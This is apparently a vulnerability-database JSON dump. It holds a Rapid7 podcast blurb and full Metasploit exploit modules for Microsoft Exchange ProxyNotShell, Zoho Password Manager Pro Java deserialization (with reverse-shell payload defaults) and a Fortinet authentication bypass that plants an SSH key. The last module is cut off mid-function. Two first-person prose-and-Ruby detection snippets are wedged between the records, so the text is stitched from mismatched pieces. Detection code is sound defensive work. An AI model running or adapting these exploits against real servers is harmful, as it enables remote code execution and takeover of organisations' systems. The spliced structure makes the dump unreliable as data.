He is a frequent speaker at numerous prestigious venues, including both Black Hat USA and EU, OWASP AppSec USA and EU, and DEFCON.\n\n## Show notes\n\n****Interview links****\n\n * Prior Security Nation episode in which loads of Portswigger references were dropped: \n\n * https://www.rapid7.com/blog/post/2021/08/18/security-nation-daniel-crowley/ \n\n * New research from James about browser-powered desync attacks: \n\n * https://portswigger.net/research/browser-powered-desync-attacks\n\n****Rapid Rundown links****\n\n * Semi-secret Fortinet advisory: <https://twitter.com/Gi7w0rm/status/1578398457227878407> \n\n * CVE Details as they come: <https://www.rapid7.com/blog/post/2022/10/07/cve-2022-40684-remote-authentication-bypass-vulnerability-in-fortinet-firewalls-web-proxies/> \n\n * Existence of Fortinet CVE-2022-40684 PoC posted, but not the PoC itself: <https://twitter.com/Horizon3Attack/status/1579285863108087810> \n\n * The Hidden Harms of Silent Patches: <https://www.rapid7.com/blog/post/2022/06/06/the-hidden-harm-of-silent-patches/>\n\nLike the show? Want to keep Jen and Tod in the podcasting business? 
Feel free to rate and review with your favorite podcast purveyor, like [****Apple Podcasts****](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784#see-all/reviews>).\n\n#### Want More Inspiring Stories From the Security Community?\n\n[Subscribe to Security Nation Today](<https://podcasts.apple.com/us/podcast/security-nation/id1124543784>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T18:05:46", "type": "rapid7blog", "title": "[Security Nation] James Kettle of PortSwigger on Advancing Web-Attack Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-12T18:05:46", "id": "RAPID7BLOG:2BF1C4EA2B7AB37B7A16840E193AAC4B", "href": "https://blog.rapid7.com/2022/10/12/security-nation-james-kettle-of-portswigger-on-advancing-web-attack-research/", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2022-11-30T21:04:16", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-30T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyNotShell Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-30T00:00:00", 
"id": "PACKETSTORM:170066", "href": "https://packetstormsecurity.com/files/170066/Microsoft-Exchange-ProxyNotShell-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Remote::HTTP::Exchange \ninclude Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyNotShell RCE', \n'Description' => %q{ \nThis module chains two vulnerabilities on Microsoft Exchange Server \nthat, when combined, allow an authenticated attacker to interact with \nthe Exchange Powershell backend (CVE-2022-41040), where a \ndeserialization flaw can be leveraged to obtain code execution \n(CVE-2022-41082). This exploit only support Exchange Server 2019. \n \nThese vulnerabilities were patched in November 2022. 
\n}, \n'Author' => [ \n'Orange Tsai', # Discovery of ProxyShell SSRF \n'Spencer McIntyre', # Metasploit module \n'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis \n'Piotr Bazyd\u0142o', # Vulnerability analysis \n'Rich Warren', # EEMS bypass via ProxyNotRelay \n'Soroush Dalili' # EEMS bypass \n], \n'References' => [ \n[ 'CVE', '2022-41040' ], # ssrf \n[ 'CVE', '2022-41082' ], # rce \n[ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ], \n[ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ], \n[ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ], \n[ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ] \n], \n'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08 \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Platform' => ['windows'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Dropper', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_dropper \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD], \n'Type' => :windows_command \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'AKA' => ['ProxyNotShell'], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \n) \n \nregister_options([ \nOptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]), \nOptString.new('PASSWORD', [ true, 'The password to authenticate with' ]), \nOptString.new('DOMAIN', [ false, 'The domain to authenticate to' ]) \n]) \n \nregister_advanced_options([ \nOptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 
'IBM037v1', %w[IBM037v1 none]]) \n]) \nend \n \ndef check \n@ssrf_email ||= Faker::Internet.email \nres = send_http('GET', '/mapi/nspi/') \nreturn CheckCode::Unknown if res.nil? \nreturn CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401 \nreturn CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint' \n \n# actually run the powershell cmdlet and see if it works, this will fail if: \n# * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN) \n# * the exchange emergency mitigation service M1 rule is in place \nreturn CheckCode::Safe unless execute_powershell('Get-Mailbox') \n \nCheckCode::Vulnerable \nrescue Msf::Exploit::Failed => e \nCheckCode::Safe(e.to_s) \nend \n \ndef ibm037(string) \nstring.encode('IBM037').force_encoding('ASCII-8BIT') \nend \n \ndef send_http(method, uri, opts = {}) \nopts[:authentication] = { \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'preferred_auth' => 'NTLM' \n} \n \nif uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1' \nuri = \"/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' 
+ @ssrf_email)}\" \nopts[:headers] = { \n'X-Up-Devcap-Post-Charset' => 'IBM037', \n# technique needs the \"UP\" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362 \n'User-Agent' => \"UP #{datastore['UserAgent']}\" \n} \nelse \nuri = \"/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}\" \nend \n \nsuper(method, uri, opts) \nend \n \ndef exploit \n# if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not \n# work on Exchange Server 2016 \nif datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version) \nvprint_status(\"Detected Exchange version: #{version}\") \nif version < Rex::Version.new('15.2') \nfail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)') \nend \nend \n \n@ssrf_email ||= Faker::Internet.email \n \ncase target['Type'] \nwhen :windows_command \nvprint_status(\"Generated payload: #{payload.encoded}\") \nexecute_command(payload.encoded) \nwhen :windows_dropper \nexecute_cmdstager({ linemax: 7_500 }) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nxaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root \n<ResourceDictionary \nxmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\" \nxmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" \nxmlns:System=\"clr-namespace:System;assembly=mscorlib\" \nxmlns:Diag=\"clr-namespace:System.Diagnostics;assembly=system\"> \n<ObjectDataProvider x:Key=\"LaunchCalch\" ObjectType=\"{x:Type Diag:Process}\" MethodName=\"Start\"> \n<ObjectDataProvider.MethodParameters> \n<System:String>cmd.exe</System:String> \n<System:String>/c #{cmd.encode(xml: :text)}</System:String> \n</ObjectDataProvider.MethodParameters> \n</ObjectDataProvider> \n</ResourceDictionary> \nXAML \n \nidentity = 
Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root \n<Obj N=\"V\" RefId=\"14\"> \n<TN RefId=\"1\"> \n<T>System.ServiceProcess.ServiceController</T> \n<T>System.Object</T> \n</TN> \n<ToString>Object</ToString> \n<Props> \n<S N=\"Name\">Type</S> \n<Obj N=\"TargetTypeForDeserialization\"> \n<TN RefId=\"1\"> \n<T>System.Exception</T> \n<T>System.Object</T> \n</TN> \n<MS> \n<BA N=\"SerializationData\"> \n#{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)} \n</BA> \n</MS> \n</Obj> \n</Props> \n<S> \n<![CDATA[#{xaml}]]> \n</S> \n</Obj> \nIDENTITY \n \nexecute_powershell('Get-Mailbox', args: [ \n{ name: '-Identity', value: identity } \n]) \nend \nend \n \nclass XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream \ninclude Msf::Util::DotNetDeserialization \n \ndef self.generate \nfrom_values([ \nTypes::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1), \nTypes::RecordValues::SystemClassWithMembersAndTypes.from_member_values( \nclass_info: Types::General::ClassInfo.new( \nobj_id: 1, \nname: 'System.UnitySerializationHolder', \nmember_names: %w[Data UnityType AssemblyName] \n), \nmember_type_info: Types::General::MemberTypeInfo.new( \nbinary_type_enums: %i[String Primitive String], \nadditional_infos: [ 8 ] \n), \nmember_values: [ \nTypes::Record.from_value(Types::RecordValues::BinaryObjectString.new( \nobj_id: 2, \nstring: 'System.Windows.Markup.XamlReader' \n)), \n4, \nTypes::Record.from_value(Types::RecordValues::BinaryObjectString.new( \nobj_id: 3, \nstring: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' \n)) \n] \n), \nTypes::RecordValues::MessageEnd.new \n]) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/170066/exchange_proxynotshell_rce.rb.txt"}, {"lastseen": "2022-08-03T16:24:48", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 
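The module above reaches the `/powershell` backend through `autodiscover.json` and, by default, wraps that path in IBM037 (EBCDIC) so a byte-level URL-rewrite rule never sees the string `powershell`. The Ruby below is an added example, my own code rather than the module's or anything from the original page: it rebuilds both URI shapes from `send_http`, then shows that a raw-byte pattern misses the encoded one while a detector that decodes the query string with the charset the request announces catches it. `NAIVE_RULE` is a simplified stand-in for the mitigation pattern, not its exact text, and the e-mail address and backend path are constructed.

```ruby
# Added example: why the IBM037 (EBCDIC) trick in send_http slips past a
# byte-level URL rule, and the normalization a detector needs. My code, not
# the module's.

# Simplified stand-in for the URL-rewrite mitigation pattern (assumption: this
# is not the exact production rule text). It inspects raw bytes, which is the
# weakness being demonstrated.
NAIVE_RULE = /autodiscover\.json.*@.*powershell/i

# Reverse EBCDIC table derived from the same encoder call the module uses, so
# decoding does not depend on an IBM037 -> UTF-8 transcoder being available.
IBM037_TO_ASCII = (0x20..0x7e).each_with_object({}) do |c, tbl|
  tbl[c.chr(Encoding::UTF_8).encode('IBM037').bytes.first] = c.chr
end

def ibm037(str)
  str.encode('IBM037').force_encoding('ASCII-8BIT')
end

# Map IBM037 bytes back to printable ASCII; any other byte passes through.
def decode_ibm037(bin)
  bin.bytes.map { |b| IBM037_TO_ASCII.fetch(b) { b.chr } }.join
end

Request = Struct.new(:path, :headers, keyword_init: true)

# The two URI shapes send_http builds. Only the query string is EBCDIC; the
# /Autodiscover/autodiscover.json prefix stays ASCII.
def ssrf_request(email, backend, encoded: false)
  if encoded
    q1 = ibm037(email + backend + '?')
    q2 = ibm037('Autodiscover/autodiscover.json?' + email)
    Request.new(path: "/Autodiscover/autodiscover.json?#{q1}&#{ibm037('Email')}=#{q2}",
                headers: { 'X-Up-Devcap-Post-Charset' => 'IBM037', 'User-Agent' => 'UP Mozilla/5.0' })
  else
    Request.new(path: "/Autodiscover/autodiscover.json?#{email + backend}?&Email=Autodiscover/autodiscover.json?#{email}",
                headers: { 'User-Agent' => 'Mozilla/5.0' })
  end
end

# Constructed samples: the address and backend path are invented.
def sample_requests
  email = 'jdoe@example.test'
  {
    plain: ssrf_request(email, '/powershell'),
    ibm037: ssrf_request(email, '/powershell', encoded: true),
    benign: Request.new(path: "/Autodiscover/autodiscover.json?Email=#{email}",
                        headers: { 'User-Agent' => 'Mozilla/5.0' })
  }
end

# The charset override is honoured only for "UP "-prefixed user agents (see the
# HttpListenerRequest reference in the module), so mirror that condition.
def announces_ibm037?(headers)
  headers['User-Agent'].to_s.start_with?('UP ') &&
    headers['X-Up-Devcap-Post-Charset'].to_s.casecmp?('IBM037')
end

# What a byte-level rule sees.
def naive_match?(req)
  NAIVE_RULE.match?(req.path)
end

# What the server will see: the query string decoded with the announced charset.
def normalized_match?(req)
  prefix, query = req.path.split('?', 2)
  query = decode_ibm037(query) if query && announces_ibm037?(req.headers)
  NAIVE_RULE.match?([prefix, query].compact.join('?'))
end

# True when the request reaches the backend but the byte-level rule stays quiet.
def evades_naive_rule?(req)
  normalized_match?(req) && !naive_match?(req)
end

if $PROGRAM_NAME == __FILE__
  sample_requests.each do |name, req|
    puts format('%-7s naive=%-5s normalized=%-5s evasion=%s', name,
                naive_match?(req), normalized_match?(req), evades_naive_rule?(req))
  end
end
```

If the logs you feed this carry the query string percent-encoded, unescape it first; the point is to decode the query with the charset the request announced, and only under the `UP` user-agent condition, because that is when the server applies it. Microsoft revised the published rewrite rule more than once as bypasses of this kind surfaced, which is the practical argument for normalizing before matching rather than tuning the pattern.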
{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T00:00:00", "type": "packetstorm", "title": "Zoho Password Manager Pro XML-RPC Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-08-03T00:00:00", "id": "PACKETSTORM:167918", "href": "https://packetstormsecurity.com/files/167918/Zoho-Password-Manager-Pro-XML-RPC-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::JavaDeserialization \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Zoho Password Manager Pro XML-RPC Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in Zoho ManageEngine Password Manager Pro \nbefore 12101 and PAM360 before 5510. Unauthenticated attackers can send a \ncrafted XML-RPC request containing malicious serialized data to /xmlrpc to \ngain RCE as the SYSTEM user. 
\n}, \n'Author' => [ \n'Vinicius', # Discovery \n'Y4er', # Writeup \n'Grant Willcox' # Exploit \n], \n'References' => [ \n['CVE', '2022-35405'], \n['URL', 'https://xz.aliyun.com/t/11578'], # Writeup \n['URL', 'https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html'], # Advisory \n['URL', 'https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm'] # The patch. \n], \n'DisclosureDate' => '2022-06-24', # Vendor release date of patch and new installer, as advisory lacks any date. \n'License' => MSF_LICENSE, \n'Platform' => ['win'], \n'Arch' => [ARCH_CMD, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows EXE Dropper', \n{ \n'Arch' => ARCH_X64, \n'Type' => :windows_dropper, \n'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } \n} \n], \n[ \n'Windows Command', \n{ \n'Arch' => ARCH_CMD, \n'Type' => :windows_command, \n'Space' => 3000, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' } \n} \n], \n[ \n'Windows Powershell', \n{ \n'Arch' => ARCH_X64, \n'Type' => :windows_powershell, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp' } \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(7272), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \n# Send an empty serialized object \nres = send_request_xmlrpc('') \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nif res.body.include?('Failed to read result object: null') \nreturn CheckCode::Vulnerable('Target can deserialize arbitrary data.') \nend \n \nCheckCode::Safe('Target cannot deserialize arbitrary data.') \nend \n \ndef exploit \nprint_status(\"Executing 
#{target.name} for #{datastore['PAYLOAD']}\") \ncase target['Type'] \nwhen :windows_command \nexecute_command(payload.encoded) \nwhen :windows_dropper \ncmd_target = targets.select { |target| target['Type'] == :windows_command }.first \nexecute_cmdstager({ linemax: cmd_target.opts['Space'] }) \nwhen :windows_powershell \nexecute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_xmlrpc( \ngenerate_java_deserialization_for_command('CommonsBeanutils1', 'cmd', cmd) \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\") \nend \n \nprint_good(\"Successfully executed command: #{cmd}\") \nend \n \ndef send_request_xmlrpc(data) \n# http://xmlrpc.com/ \n# https://ws.apache.org/xmlrpc/ \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/xmlrpc'), \n'ctype' => 'text/xml', \n'data' => <<~XML \n<?xml version=\"1.0\"?> \n<methodCall> \n<methodName>#{rand_text_alphanumeric(8..42)}</methodName> \n<params> \n<param> \n<value> \n<struct> \n<member> \n<name>#{rand_text_alphanumeric(8..42)}</name> \n<value> \n<serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">#{Rex::Text.encode_base64(data)}</serializable> \n</value> \n</member> \n</struct> \n</value> \n</param> \n</params> \n</methodCall> \nXML \n) \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167918/zoho_password_manager_pro_xml_rpc_rce.rb.txt"}, {"lastseen": "2022-10-19T17:39:19", "description": "", "cvss3": {}, "published": "2022-10-19T00:00:00", "type": "packetstorm", "title": "Fortinet FortiOS / FortiProxy / FortiSwitchManager Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-19T00:00:00", "id": 
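The module above delivers its payload base64-encoded inside a `<serializable>` element from the Apache XML-RPC extensions namespace. As an added example (my code, not the module's or Zoho's), the Ruby below parses an XML-RPC body, reports any such element and whether its contents start with the Java serialization stream header, which is the signature a WAF or reverse proxy in front of `/xmlrpc` would key on. The sample bodies are constructed; the "attack" one carries only the four header bytes plus filler, not a gadget chain.

```ruby
require 'rexml/document'

# Added example: flag XML-RPC bodies that carry the <serializable> extension
# element this module abuses. My code, not the module's or the vendor's.

EXT_NS = 'http://ws.apache.org/xmlrpc/namespaces/extensions'
# Java ObjectOutputStream header: STREAM_MAGIC (0xACED) + STREAM_VERSION (5).
JAVA_STREAM_MAGIC = "\xAC\xED\x00\x05".b

Finding = Struct.new(:method_name, :serializable_elements, :java_streams, keyword_init: true)

# Base64 via pack/unpack so no extra library is needed.
def b64(bin)
  [bin].pack('m0')
end

def unb64(txt)
  txt.to_s.strip.unpack1('m')
end

# Parse one request body; nil when it is not an XML-RPC methodCall at all.
def inspect_xmlrpc(body)
  doc = REXML::Document.new(body)
  return nil unless doc.root && doc.root.name == 'methodCall'

  ser = REXML::XPath.match(doc, '//*').select do |el|
    el.name == 'serializable' && el.namespace == EXT_NS
  end
  streams = ser.count { |el| unb64(el.text).start_with?(JAVA_STREAM_MAGIC) }
  name_el = REXML::XPath.first(doc, '//methodName')
  Finding.new(method_name: name_el ? name_el.text.to_s : '',
              serializable_elements: ser.size, java_streams: streams)
rescue REXML::ParseException
  nil
end

# Any serializable element is worth alerting on (the module's own check sends
# an empty one); a Java stream header inside it is the deserialization attempt.
def verdict(finding)
  return :not_xmlrpc if finding.nil?
  return :java_deserialization if finding.java_streams.positive?
  return :serializable_extension if finding.serializable_elements.positive?

  :ordinary
end

# Constructed sample bodies shaped like the module's send_request_xmlrpc.
def wrap(method_name, value_xml)
  <<~XML
    <?xml version="1.0"?>
    <methodCall>
      <methodName>#{method_name}</methodName>
      <params><param><value><struct><member>
        <name>k</name><value>#{value_xml}</value>
      </member></struct></value></param></params>
    </methodCall>
  XML
end

def sample_bodies
  {
    benign: wrap('system.listMethods', '<string>hello</string>'),
    probe: wrap('a1B2c3', %(<serializable xmlns="#{EXT_NS}"></serializable>)),
    # Header bytes followed by filler: not a gadget chain.
    attack: wrap('Zq9x', %(<serializable xmlns="#{EXT_NS}">#{b64(JAVA_STREAM_MAGIC + 'filler'.b)}</serializable>))
  }
end

if $PROGRAM_NAME == __FILE__
  sample_bodies.each { |name, body| puts "#{name}: #{verdict(inspect_xmlrpc(body))}" }
end
```

On the server side the element is only honoured when the Apache XML-RPC library has extensions enabled (`enabledForExtensions`), so turning that off where the extension types are not needed removes the vector. The module's `check` relies on the `Failed to read result object: null` reply to an empty payload; that same reply lets a defender confirm exposure without sending a gadget.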
"PACKETSTORM:169431", "href": "https://packetstormsecurity.com/files/169431/Fortinet-FortiOS-FortiProxy-FortiSwitchManager-Authentication-Bypass.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::SSH \nprepend Msf::Exploit::Remote::AutoCheck \n \nattr_accessor :ssh_socket \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.', \n'Description' => %q{ \nThis module exploits an authentication bypass vulnerability \nin the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API \nto gain access to a chosen account. And then add a SSH key to the \nauthorized_keys file of the chosen account, allowing \nto login to the system with the chosen account. \n \nSuccessful exploitation results in remote code execution. 
\n}, \n'Author' => [ \n'Heyder Andrade <@HeyderAndrade>', # Metasploit module \n'Zach Hanley <@hacks_zach>', # PoC \n], \n'References' => [ \n['CVE', '2022-40684'], \n['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'], \n['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'], \n], \n'License' => MSF_LICENSE, \n'DisclosureDate' => '2022-10-10', # Vendor advisory \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD], \n'Privileged' => true, \n'Targets' => [ \n[ \n'FortiOS', \n{ \n'DefaultOptions' => { \n'PAYLOAD' => 'generic/ssh/interact' \n}, \n'Payload' => { \n'Compat' => { \n'PayloadType' => 'ssh_interact' \n} \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, \nARTIFACTS_ON_DISK # SSH key is added to authorized_keys file \n] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']), \nOptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]), \nOptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]), \nOptString.new('KEY_PASS', [false, 'SSH private key password', nil]), \nOptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]), \nOptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true]) \n] \n) \nend \n \ndef username \nif datastore['USERNAME'] \n@username ||= datastore['USERNAME'] \nelse \n@username ||= detect_username \nend \nend \n \ndef ssh_rport \ndatastore['SSH_RPORT'] \nend \n \ndef current_keys \n@current_keys ||= read_keys \nend \n \ndef ssh_keygen \n# ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8` \nif datastore['PRIVATE_KEY'] \n@ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key( \nFile.read(datastore['PRIVATE_KEY']), 
\ndatastore['KEY_PASS'], \ndatastore['PRIVATE_KEY'] \n) \nelse \n@ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1') \nend \nend \n \ndef ssh_private_key \nssh_keygen.to_pem \nend \n \ndef ssh_pubkey \nRex::Text.encode_base64(ssh_keygen.public_key.to_blob) \nend \n \ndef authorized_keys \npubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob) \n\"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost\" \nend \n \ndef fortinet_request(params = {}) \nsend_request_cgi( \n{ \n'ctype' => 'application/json', \n'agent' => 'Report Runner', \n'headers' => { \n'Forwarded' => \"for=\\\"[127.0.0.1]:#{rand(1024..65535)}\\\";by=\\\"[127.0.0.1]:#{rand(1024..65535)}\\\"\" \n} \n}.merge(params) \n) \nend \n \ndef check \nvprint_status(\"Checking #{datastore['RHOST']}:#{datastore['RPORT']}\") \n# a normal request to the API should return a 401 \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)), \n'ctype' => 'application/json' \n}) \n \nreturn CheckCode::Unknown('Target did not respond to check.') unless res \nreturn CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401 \n \n# Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable \nres = fortinet_request({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/system/status') \n}) \n \nreturn CheckCode::Safe unless res&.code == 200 \n \nversion = res.get_json_document['version'] \n \nprint_good(\"Target is running the version #{version}, which is vulnerable.\") \n \nSocket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\\t give you access to the host.') unless sock } \n \nCheckCode::Vulnerable('And SSH is running which makes it exploitable.') \nend \n \ndef cleanup \nreturn unless ssh_socket \n \n# it assumes our key is the last 
one and set it to a random text. The API didn't respond to DELETE method \ndata = { \n\"ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}\" => '\"\"' \n} \n \nfortinet_request({ \n'method' => 'PUT', \n'uri' => normalize_uri(target_uri.path, '/system/admin/', username), \n'data' => data.to_json \n}) \nend \n \ndef detect_username \nvprint_status('User auto-detection...') \nres = fortinet_request( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/system/admin') \n) \nusers = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact \n# we prefer to use admin, but if it doesn't exist we chose a random one. \nif datastore['PREFER_ADMIN'] \nvprint_status(\"PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.\") \nusers.include?('admin') ? 'admin' : users.sample \nelse \nvprint_status(\"PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.\") \n(users - ['admin']).sample 